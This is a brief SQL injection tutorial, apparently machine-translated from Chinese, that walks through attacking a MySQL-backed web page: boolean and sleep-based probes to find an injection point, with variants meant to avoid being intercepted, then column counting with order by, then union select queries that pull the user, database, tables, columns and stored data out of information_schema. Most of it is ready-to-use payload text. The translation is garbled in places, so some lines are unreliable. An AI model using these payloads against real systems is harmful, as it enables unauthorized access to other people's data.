SQL injection essence
Is input as the user data code execution
Injection conditions
1. The user can control the input
code is 2. otherwise the program can be executed on the user input data splicing execution
例:
http://www.xxx.com/new.php?id=1
http://www.xxx.com/new.php?id=2-1The basic flow injection
1 determines whether there is the injection point
1. The oldest method:
and 1 = 1 page normal
and 1 = 2 is not normal page
Note: and 1 = 1 and 1 = 2 is too high possibility of being intercepted
can try and -1 = -1 and -1 = -2 or direct or sleep (5)
2. The easiest way:
Plus the back page 'to see if an error
3. The common methods:
If the transmission is a numeric reference, you can try -1
2. Guess the number of solution fields
// number of fields in order by the given number of fields is displayed in front of a value
3. The United query to find the injection point
and 1 = 2 union select 1,2,3, ...... // fields can be written up
4. burst databases, tables, fields
Check the user rights: union select 1, user () , 3
check library: union select 1, database () , 3
lookup: union select 1, (select group_concat (table_name) from information_schema.tables where table_schema = ' library name') , 3
check field: union select 1, (select group_concat (column_name) from information_schema.columns where table_schema = ' library name' and table_name = 'table'), 3
5. Query the data we need
Survey data: union select 1, (. Select group_concat (field 1, field 2) from Library Name Table), 3
Injection of commonly used functions:
GROUP_CONCAT (Field 1, Field 2) // Returns the column values belonging to a group connected to a combination of
ASCII (char) // returns the ASCII value
DATABASE () // Returns the current database name
USER () or SYSTEM_USER () // returns the currently logged in user name
vERSION () // returns the version of the MySQL server
sLEEP (n) // sleep n seconds